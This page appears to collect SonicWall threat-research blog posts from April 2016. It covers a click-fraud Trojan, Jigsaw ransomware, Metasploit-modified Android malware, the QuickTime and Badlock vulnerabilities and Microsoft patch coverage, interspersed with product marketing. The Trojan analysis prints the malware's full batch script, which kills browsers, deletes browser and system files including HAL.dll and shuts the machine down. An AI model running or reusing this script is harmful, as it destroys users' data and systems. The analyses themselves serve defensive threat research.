Click-fraud Trojan deletes files and impairs systems (April 29th, 2016)

The Dell Sonicwall Threats Research team have discovered a Click-fraud Trojan that also deletes files and attempts to disable parts of the operating system. It appears to be poorly written and did not succeed in its intention to disable the mouse and keyboard on our test system. It is however, able to delete files, kill explorer.exe and shutdown the system.

Infection Cycle:

The Trojan drops the following file and runs it:

  • %USERPROFILE%Local SettingsTemp2.tmpVirusok.bat

Virusok.bat is a Windows batch script:

The script contains the following instructions:

      @shift /0
      @echo off
      taskkill /im /f chrome.exe
      taskkill /im /f ie.exe
      taskkill /im /f firefox.exe
      taskkill /im /f opera.exe
      taskkill /im /f safari.exe
      del C:Program FilesGoogleChromeAppulcationchrome.exe /q
      del C:Program FilesSafarisafari.exe /q
      del C:Program FilesMozilla Firefoxfirefox.exe /q
      del C:Program FilesOperaopera.exe /q
      del C:Program FilesInternet Explorerie.exe /q
      rundll32 mouse,disable > nul
      rundll32 keyboard,disable > nul
      rundll32 user,disableoemlayer > nul
      reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoulciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f > nul
      taskkill /f /im explorer.exe > nul
      del: *.*/q > nul
      del %WinDir%system32HAL.dll/q > nul
      del "%SystemRoot%Driver" /f /q >nul
      del "%SystemRoot%Cursors*.*" >nul
      shutdown -s -t 00 -c error > nul
      del %0

In addition to deleting and hal.dll it deletes all files in the current directory that it is being run from as instructed in the batch script above:

      del: *.*/q > nul

The Trojan causes the following DOS window to be displayed on the screen:

As instructed in the batch script it opens Internet Explorer in order to display as part of its Click-fraud operation:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Reconyc.A_4 (Trojan)

The SonicWall Security Threat Report 2016: Highlighting Trends in Exploit Kits

In February, we released our SonicWall Security 2016 Threat Report, and one of its highlights was a discussion on latest techniques and trends in exploit kits (EKs).

EKs have become a key tool for cybercriminals to take over the target machines (via an exploit) and subsequently install a malware of their choice.

For those who have some background in researching EKs, their stages would seem familiar. First, there is a redirection stage. This leads the user to the landing page of the EK (either directly or via infected website). This redirection stage can occur as a result of a URL link in the spam email or Twitter/Facebook feed, advertising banner redirection (malvertising) or simply an IFRAME redirection from an infected website.

Next is the landing stage. Here, the target visits the actual web server where the EK software resides (i.e., the landing page) and the exploit is delivered.

During exploitation, carefully crafted scripts determine the software components installed on victims machines (in order to select an appropriate exploit first). Then the successful targeted exploit is delivered and malware is subsequently installed on target machines.

Some of the stages described above can be shown using Spartan EK discovered by the SonicWall Threat Research team last year.

As you may note in Spartan’s exploit kit delivery technique, the initial Flash file was encrypted, and the actual exploit code resided only in memory and was never written to disk (thus avoiding potential detection by AV software).

EK delivery mechanisms are evolving, and require security vendors to use the latest up-to-date evasion techniques in order to successfully detect and/or prevent the attacks. It is not uncommon for EKs to check for the presence of certain AV software or virtualized environment during exploit stage, and thus abort its execution to prevent exposing itself to security professionals (see example code below).

For example, last year, we observed the Magnitude EK using steganography techniques during the redirection stage to dynamically generate an IFRAME from an encrypted/encoded image file. Such techniques make it more difficult for affected website owner to identify a potential website infection.

In addition, landing page URLs undergo periodic modifications to avoid detection by security vendors. We have observed landing page URL patterns change within 48 hours for certain EKs. Also, landing page’s software component detection techniques have undergone changes as well. Unlike in the past, we have observed EKs that can determine browser/component versions running on target systems without utilizing the JavaScript PluginDetect library.

What are some important conclusions security product designers can draw from the latest trends in EKs? For one, due to all the exploit and malware payload obfuscation trends in the latest exploit delivery techniques of exploit kits, it is now more important to quickly and correctly identify EK landing page access, and stop the exploit delivery immediately at the point of landing page access by the user. Thus, tracking EKs and their latest attack techniques is an important part of any threat research team’s activity.

Download the SonicWall Security Annual Threat Report today.

Jigsaw Ransomware spotted in the wild (April 22, 2016)

The Dell SonicWall Threats Research team has received reports of a new Ransomware Trojan, Jigsaw (named after the fictional character) which encrypts the system files and also deletes them if the payment is not made on time.

Infection cycle:

The Trojan poses as firefox with the following properties:

The Trojan adds the following files to the filesystem:

  • %APPDATA%RoamingFrfxfirefox.exe (copy of original) [Detected as GAV: Jigsaw.A (Trojan)]

The Trojan creates the following key to the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “”%APPDATA%RoamingFrfxfirefox.exe””

It displays the following iconic image and the message while encrypting the files:

It starts countdown and threatens to delete the files mentioned each hour.

The trojan finds the following files on the victim’s machine and encrypts them:

It copies the filenames before encrypting at the following location:

It encrypts all the victims files listed above with .fun extension.

When trying to close the ransom window, it displays the following message:

It checks for the payment contacting the C&C server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Jigsaw.A (Trojan)

Apple Quicktime Memory Corruption Vulnerability (Apr 21, 2016)

Apple QuickTime is an extensible multimedia framework, capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. QuickTime is bundled with OS X. QuickTime for Microsoft Windows is downloadable as a standalone installation. Apple Ends Support for QuickTime for Windows this year and the last security update was released in January 2016.

There was a memory corruption vulnerability found in QuickTime product which allows remote attackers to execute arbitrary code or cause a denial of service via a crafted Photoshop file. The vulnerability is referred by CVE as CVE-2016-1769. A security patch was released for OS X El Capitan v10.11 to v10.11.3. However, for QuickTime Window versions, please remove the application to eliminate the possibility of being attacked.

Dell SonicWALL researcher team has investigated this vulnerability and released the following signature to protect their customers:

  • SPY: 4493 Malformed-File psd.TL.1

How to Open Your Own Department of Yes

Securing large organizations is a massively complex task. There are so many different domains of security to think about, it can drive a person crazy. Fortunately, as we work closely with our customers and partners, we have the opportunity to see and address many of these challenges. We share what we learn with the security community to show them how to think about identity and access management (IAM) and network security in a unified way to get more out of each solution without incurring more cost. We are on a mission to help CISOs open their very own “Department of Yes.” The goal is to help them see how IAM and network security can be business enablers.

For example, with SonicWall IAM and network security solutions working together, a policy on the next-generation firewall can help enforce an application governance policy defined in the IAM solution. SonicWall next-generation firewalls can be easily integrated with SonicWall One Identity Safeguard for Privileged Passwords to help tighten up security of the most trusted assets in any organization. Cloud Access Manager can consume data from the firewall to require elevated authentication. These are just a few examples of what we can do today and there will be more integration in the future that will help the CISO say yes more often.

On Monday, Curtis Hutcheson, VP and GM of SonicWall Security Solutions discussed in his blog the importance of becoming the Department of Yes. Curtis discussed our new approach to IT security ““ Govern and Protect ““ where our network-aware identity solutions and our identity-aware network solutions work together to enable organizations to take advantage of better security with less complexity and lower costs. By becoming the Department of Yes, the security team can now easily embrace new, innovative initiatives such as moving to the cloud, BYOD, digital transformation, the internet of things and more.

By governing every identity across the organization with our identity governance, privileged management and access management while inspecting every packet with our next-gen firewalls, secure mobile access, and email security, IT organizations no longer need to say no to supporting new strategic business initiatives.

We believe that our customers should be able to deploy strong identity and access management in concert with robust network security solutions where the two reinforce each other. By making the network security solution identity-aware and the identity management solution network-aware, we can now deliver superior protection and governance while lowering costs.

For more information on how you can open your own Department of Yes, be sure to check out this new SonicWall Security web site.

Is Your CISO Organization the Department of Yes? SonicWall Security Delivers

Businesses are ramping technology investments and capabilities faster than ever. Employees, customers and partners are accessing more applications and data every day. These investments drive enormous value to the business, but also create IT complexity and security vulnerabilities.

Our customers and partners constantly ask us to help them rise to these challenges, to help them deliver innovative initiatives and improve collaboration, while protecting their company. Often, the security risks around these new applications, projects and technologies, force IT to say “NO” to their business partners.

To change this model, we have invested in  SonicWall and SonicWall One Identity solutions to help organizations become more innovative and create competitive advantages by driving initiatives such as:

  • Leading your organization to the cloud
  • Deploying BYOD across your organization
  • Enabling a digital transformation
  • Completing stress-free audits

We feel that it’s time for a radically different point of view and SonicWall Security’s context-aware, integrated security solutions put us in the unique position to offer organizations the security they need in today’s complex IT environment.  SonicWall and SonicWall One Identity enable CISOs to govern every identity and inspect every packet, effectively identifying and isolating rogue activity, while letting the acceptable traffic flow.

These network inspection and identity governance capabilities give organizations the ability to confidently push beyond traditional boundaries while controlling vulnerabilities. We are empowering IT teams to deliver the strategic projects and capabilities that drive your business forward while providing the security you need.

We want to enable the IT security team to become the Department of “Yes.”

SonicWall and One Identity solutions reinforce each other to ensure we’re setting the highest bar for value to our partners and customers.

We’ve created this extensive security portfolio to enable you to:

  • Not only detect but also block advhelpanced threats at the gateway before they get into your network with extreme low latency
  • Automatically allow or deny ““ or step up authentication ““ for every user access attempt based on context that is derived from the network to identify abnormal activity
  • Provision a new employee, partner or contractor in 15 minutes across your enterprise and then de-provisioning them 15 minutes after they depart
  • Leverage Privileged Account Management controls like password vaulting and session management for those identities who have the “keys to the kingdom”

As we lead in the market with our innovative solutions, we can help you attain true governance of user and admin access to your network, applications and data and deeper security without compromising performance. We are committed to do all of this, effectively raising productivity and security, without increasing your costs.

For more information on how to start become the Department of Yes, explore our new informative SonicWall Security web site

Metasploit enhanced Android malware spotted in the wild (April 15, 2016)

Metasploit is one of the most widely used Penetration Testing tool to test and improve defenses of internet facing services. It boasts of more than 1300 exploits and new ones are added at regular intervals thanks to the strong community that backs these efforts. Metasploit contains a number of different modules that cater to different requirements. For instance there are exploits that focus on a particular weakness whereas payloads consist of code that runs remotely.

Android has been relishing popularity among mobile phone users but at the same time there has been a lot of security concerns with regards to malware and other vulnerabilities, Metasploit developers saw this as a new avenue for research and introduced the support to generate Android specific payloads. Using these payloads an attacker can run myriad commands on a victims Android device, provided a modified APK (Android Package) with Metasploit modules is present on the target.

Dell SonicWALL Threats Research team recently observed a slew of Android malware that contain Metasploit specific components. This might be an indication of a new wave of Metasploit specific Android malware that will become commonplace in the near future.

Metasploit for Android

Using Metasploit it is possible to gain shell access on a target device which allows the attacker to perform a number of operations, additionally if the device is rooted the attacker can perform system level changes as well. The following high level steps are involved in creating a malicious Metasploit modified apk to compromise a victims device:

  • msfvenom module is used to modify a clean APK and add a reverse TCP component into it
  • Reverse TCP essentially makes the malicious apk initiate a connection back to the attacker who has a listener for incoming connections
  • Once the device is infected with this modified APK, it connects back to the attacker with a shell which potentially gives him unlimited access

In the past few weeks we observed a number of malicious APK’s with Metasploit reverse TCP component present in them. Below image shows the code for three APK’s; first one is the code for a clean un-modified APK, second one is for a clean APK that we modified using the msfvenom module and the last one is for a malicious APK that we obtained:

We can see that the code for both the modified APK and malicious APK has striking similarity, this gives an indication that the attacker has been using the same Metasploit module for this modification.

A callback address needs to be specified in the case of Reverse TCP, following is a subset of few IP’s that we observed in malicious APK’s during our analysis:


Some of the IPs belong to 192.168 block, in such cases it is possible that an infected private server is present that forwards the data back to the attacker. Most of the malicious APK’s we observed were standalone APK’s with only the Metasploit modules, however we did see two cases where the Metasploit module was bundled with a separate completely working APK. In these cases the Metasploit module will run in the background while the original APK keeps running in the foreground. In this scenario the victim is oblivious to the fact that the attacker has gained an open shell to his device.

The following figure shows code for the malicious APK’s with bundled Metasploit modules:

As we can see both the APK’s have similar Metasploit components along with other class files that make up the APK. The callback addresses specified in these two APK’s are as below, at the moment Virustotal deems these links as clean:


Using Metasploit as a component of a malicious APK might become more common as time passes but for now it still looks like this campaign is in its early stages. As mentioned before, this attack has tremendous impact on rooted devices as it would allow the attacker to perform system level changes. This further highlights the dangers of rooting an Android device.

Another good way to be cautious is to use security tools like OS Monitor and check for open connections on the device. A vigilant eye can catch connections opened by unknown apps as shown below:

Few MD5’s with package name com.metasploit.stage:

  • 5781e46a33b1e680606aa1bc6de0f4b3
  • e72f2256beb00995f75756fe6b1015ff
  • 8be2a9c3deb2cb042f0d169f7aa1e09c
  • 62ce4bfac9515391cf491202bde612d1
  • b72e70d3354637a1789a42766fb02b85
  • 98fa5306c6fa7a582f5cc20bee4199dd
  • dca3e24d8a713b48509ec71f7f08393a
  • 2fa4c90f4e18da57f35e20e2cfc94b36
  • 54991e04f5dea9e6b889482dd32199a6
  • babac94884531c8ded98a4a4631ec0aa
  • 955404e259d848411c6b7663eae2efb5
  • 9cfac5052012a36db9f68cad629f88bb
  • 115a6624c31874fada0480c785a25490
  • 6445745776b76f8740cd9dcbf1d819fd
  • 7d250daa3247eb9fdce99d77a4244dba
  • 52107f2cff13644cd376e3d896d4e774
  • ef1f8d649e4aa63118973f198520557a
  • 4fee3d7d944cbd16d4b43d9a45cc3ec7
  • e206152242dc89565d824378a509dbc0
  • c5951a883b738b19304ca0cda72b2ac9
  • 148bb86e18af8d49b1e41e13c00f65d8

MD5’s with Metasploit component in a working APK:

  • 3763b28338dff3f703a8192eff0f1c82 – com.thepapership.braingames.espanol
  • f36704560abc8172433820ecabcef76a – com.piriform.ccleaner

Dell SonicWALL provides protection against multiple versions of this threat via the following signature:

  • GAV: AndroidOS.Metasploit.PL (Trojan)

Protect Remote Workforce Anywhere, Anytime on Any Device

Every day, we hear terrifying headlines such as this one – 27 million doctors’ mobile devices at high risk of malware. Our recent SonicWall Threat Report confirms the increase in malware targeted to Android devices. Fortunately today we are announcing the news of our latest  SonicWall Secure Mobile Access 11.4 OS and the SMA 1000 Series to arm your IT organization with greater security, scalability and ability to abide by compliance standards. With this launch, we deliver more power and speed to remote workers to securely access corporate data via policy-based access on any mobile device.

Our new  SonicWall SMA 11.4 offers numerous state of the art features. The dynamic Global Traffic Optimizer (GTO) will enable thousands of concurrent users to have protected remote access capabilities. Our new Regulatory Compliance standards meet the strictest security for the latest government regulations. The innovative Management API will deliver enhanced workflow; and the SAML 2.0 Support will save valuable remote workforce time. Enterprises like the NFL-champion Denver Broncos are using SonicWall Secure Mobile Access (SMA). I hope you will explore what this solution can do for you and your mobile strategy.

“We increased our return on investment by using SonicWall SRA with SuperMassive next-gen firewall because we offload VPN traffic from our main firewall to the SRA.” Russ Trainor, vice president of Technology, Denver Broncos.

Secure Mobile Access (SMA) 1000 11.4 OS brings the following additional functionality enhancements to this series.

  • Global Traffic Optimizer (GTO) – provides a turnkey approach to delivering massive global scalability of concurrent users while continuing to maintain secure access. This allows customers to better address secure access of data as they face an ever-growing workforce, company expansion to different locations both within country and globally, and proliferation of device types used by workers.
  • Regulatory Compliance – ensures security compliance with the most stringent industry and government regulations, like “Federal Information Processing Standards” (FIPS) and Suite B cipher support. This is crucial in highly regulated organizations to maintain compliance (e.g., Government, Financial, Healthcare, etc.).
  • Management API – gives access to SonicWall’s SMA API. This enables enhanced workflow, orchestration and automation, improving customers’ operational processes, increasing productivity and reducing costs.
  • Enhanced SAML 2.0 support – creates a great end-user experience by allowing Single Sign-On (SSO) eliminating individual sign on to SaaS applications. This saves time used to spend in logging onto multiple applications, one at a time.

These key innovations are critical because mobile users are often using the same device for both business and personal tasks.  Consequently, businesses are at a growing risk of multiple security breaches such as:

  • Unauthorized users gaining access to company networks and systems from lost or stolen devices
  • Malware-infected devices acting as a conduit to infect company systems
  • Interception of company data “in-flight” on unsecured public Wi-Fi networks
  • Loss of business data stored on devices if rogue personal apps or unauthorized users gain access

SonicWall’s Secure Mobile Access (SMA) portfolio solves these problems our customers are facing by providing mobile and remote workers using smart phones, tablets or laptops (whether managed or unmanaged) with policy-enforced SSL VPN access to mission-critical applications, data and resources without compromising security.

In case you missed this, the following key functionality enhancements have already been added across the SMA 1000 line that are especially noteworthy: Centralized Management System (CMS), HTML Clients and Proxies and Personal Device Authorization. 

This entire impressive operating system runs on the SonicWall SMA 1000 Series Models: SRA EX6000, SMA 6200, SMA 8200V (Virtual Appliance), SRA EX7000, SMA 7200, and SRA EX9000.

Our customers are already benefiting from these powerful anytime, anywhere on any device security solutions.

“With SonicWall, we can stay at the forefront of this changing landscape. We have a great business relationship with SonicWall, and its customer service and engineering support was outstanding,” said our customere C.J. Daab, Technology Support Coordinator, Hall County School.

Learn more detail on  SonicWall Secure Mobile Access data sheet.

Badlock: Windows SAM and LSAD Downgrade Vulnerability

An elevation of privilege vulnerability exists in the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols. Microsoft and SAMBA are vulnerable to these attacks. The vulnerability is triggered when these protocols accept authentication levels that do not protect them adequately. It is caused by the way the SAM and LSAD remote protocols establish the Remote Procedure Call (RPC) channel. An attacker who successfully exploited this vulnerability could gain access to the SAM database. To exploit the vulnerability, an attacker could launch a man-in-the-middle (MiTM) attack, force a downgrade of the authentication level of the SAM and LSAD channels, and then impersonate an authenticated user. The attacker can access domain passwords as well. The security update addresses the vulnerability by modifying how the SAM and LSAD remote protocols handle authentication levels.

There are two different CVE identifiers associated with this vulnerability:

  • Microsoft: CVE-2016-0128
  • SAMBA: CVE-2016-2118

In addition to this, the vulnerability has been known by ‘badlock’.

Microsoft has two protocols that are vulnerable to this attack:

  • Security Account Manager Remote Protocol(SAMR): This protocol provides management functionality for user account store and for user/group directries.
  • Local Security Authority (LSAD): This protocol provides management functionality for user account store and for user/group directries.

These protocols manintain security account manager database. They are supported by both Windows and Samba and they support all domain profiles.
In addition to these, SAMBA’s following protocols are susceptible to this vulnerability:

  • Directory Replication Service Remote Protocol (DRSR): RPC protocol for replication and management of data in Active Directory
  • BackupKey Remote Protocol (BKRP): Encrypts and decrypts sensitive data (such as cryptographic keys)

Attack mechanism:

There are 6 authentication level (auth levels), as described in dcerpc protocol. ‘1’ is the lowest and ‘6’ being the highest:

Example of an attack scenario:

  • 1: Client sends a bind request to the server with highest security level ‘6’.
  • 2: MITM intercepts this request and changes the value from ‘6’ to ‘2’
  • 3: Server responds with auth level ‘2’ instead.

The attacker lowers the auth level to ‘2’. Level ‘2’, as shown earlier, provides minimum authetication. Note that it does not protect the messages tranferred between the client and the server. This is an ideal scenario for an attacker. With this, the attacker can achieve read/write access to the SAMR services and potentially obtain passwords and any other sensitive information

Dell Sonicwall has written the following signature that protects our cutomers from this issue. It will be available in today’s (04/12/2016) release.

  • 11560: BadLock Vulnerability
  • 11555: DCERPC AuthLevel Downgrade

Microsoft Security Bulletin Coverage (Apr 12, 2016)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of Apr. 12, 2016. A list of issues reported, along with Dell SonicWALL coverage information are as follows:

MS16-037 Cumulative Security Update for Internet Explorer

  • CVE-2016-0154 Microsoft Browser Memory Corruption Vulnerability
    IPS:11559 ” Microsoft Browser Memory Corruption Vulnerability (MS16-037) “
  • CVE-2016-0159 Internet Explorer Memory Corruption Vulnerability
    IPS:11557 ” Internet Explorer Memory Corruption Vulnerability (MS16-037) 1″
  • CVE-2016-0160 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0162 Internet Explorer Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0164 Internet Explorer Memory Corruption Vulnerability
    IPS: 11558 “Internet Explorer Memory Corruption Vulnerability (MS16-037) 2”
  • CVE-2016-0166 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-038 Cumulative Security Update for Microsoft Edge

  • a href=”″ target=”_blank”>CVE-2016-0154 Microsoft Browser Memory Corruption Vulnerability
    IPS:11559 ” Microsoft Browser Memory Corruption Vulnerability (MS16-037) “
  • CVE-2016-0155 Microsoft Edge Memory Corruption Vulnerability
    SPY:4382 ” Malformed-File exe.MP.13″
  • CVE-2016-0156 Microsoft Browser Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0157 Microsoft Edge Memory Corruption Vulnerability
    IPS: 11550 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 2”
  • CVE-2016-0158 Microsoft Edge Elevation of Privilege Vulnerability
    IPS: 11551 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 3”
  • CVE-2016-0161 Microsoft Edge Elevation of Privilege Vulnerability
    IPS: 11552 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 4”

MS16-039 Security Update for Microsoft Graphics Component

  • CVE-2016-0143 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.
  • CVE-2016-0145 Graphics Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0165 Win32k Elevation of Privilege Vulnerability
    SPY:4357 “Malformed-File exe.MP.11”
  • CVE-2016-0167 Win32k Elevation of Privilege Vulnerability
    This is a local Vulnerability.

MS16-040 Security Update for Microsoft XML Core Services

  • CVE-2016-0147 MSXML Remote Code Execution Vulnerability
    IPS: 11548 ” MSXML Remote Code Execution Vulnerability (MS16-039)1″

MS16-041 Security Update for .NET Framework

  • CVE-2016-0148 .NET Framework Remote Code Execution Vulnerability
    There are no known exploits in the wild.

MS16-042 Security Update for Microsoft Office

  • CVE-2016-0122 Microsoft Office Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0127 Microsoft Office Memory Corruption Vulnerability
    SPY:4336 “Malformed-File rtf.MP.13”
  • CVE-2016-0136 Microsoft Office Memory Corruption Vulnerability
    IPS:11258 “Malformed Excel Document 1”
  • CVE-2016-0139 Microsoft Office Memory Corruption Vulnerability
    SPY:4335 “Malformed-File xls.MP.52 “

MS16-044 Security Update for Windows OLE

  • CVE-2016-0153 Windows OLE Remote Code Execution Vulnerability
    SPY:4491 “Malformed-File doc.MP.36 “

MS16-045 Security Update for Windows Hyper-V

  • CVE-2016-0088 Hyper-V Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0089 Windows OLE Memory Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0090 Hyper-V Information Disclosure Vulnerability
    There are no known exploits in the wild.

MS16-046 Security Update for Secondary Logon

  • CVE-2016-0135 Secondary Logon Elevation of Privilege Vulnerability
    IPS: 11554 “Windows Secondary Logon Elevation of Privilege Vulnerability”

MS16-047 Security Update for SAM and LSAD Remote Protocols

  • CVE-2016-0128 Windows RPC Downgrade Vulnerability
    IPS: 11555 “DCERPC AuthLevel Downgrade (Windows)”

MS16-048 Security Update for CSRSS

  • CVE-2016-0151 Windows CSRSS Security Feature Bypass Vulnerability
    SPY:4358 ” Malformed-File exe.MP.12″

MS16-049 Security Update for HTTP.sys

  • CVE-2016-0150 HTTP.sys Denial of Service Vulnerability
    There are no known exploits in the wild.